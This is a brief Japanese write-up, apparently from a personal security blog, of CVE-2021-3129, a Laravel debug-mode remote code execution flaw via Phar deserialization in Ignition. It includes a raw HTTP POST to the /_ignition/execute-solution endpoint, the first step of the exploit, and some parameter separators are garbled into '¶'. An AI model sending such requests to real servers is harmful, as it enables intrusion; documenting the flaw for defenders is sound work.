
Laravel RCE CVE-2021-3129
Laravel RCE CVE-2021-3129
LaravelでDebugモードが有効になっている場合、Laravelに組み込まれているIgnitionコンポーネントがfile_get_contents()とfile_put_contents()関数を安全に使用していないため、攻撃者は悪意のあるリクエストを送信したり、悪意のあるログファイルを作成したりすることでPharデシリアライゼーションを誘発し、最終的にリモートコード実行を引き起こす可能性があります。
Laravel <= 8.4.2
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution¶meters[variableName]=cve20213129¶meters[viewFile]=null

[CVE-2021-3129]Laravel Debug mode RCE复現 | tyskillのBlog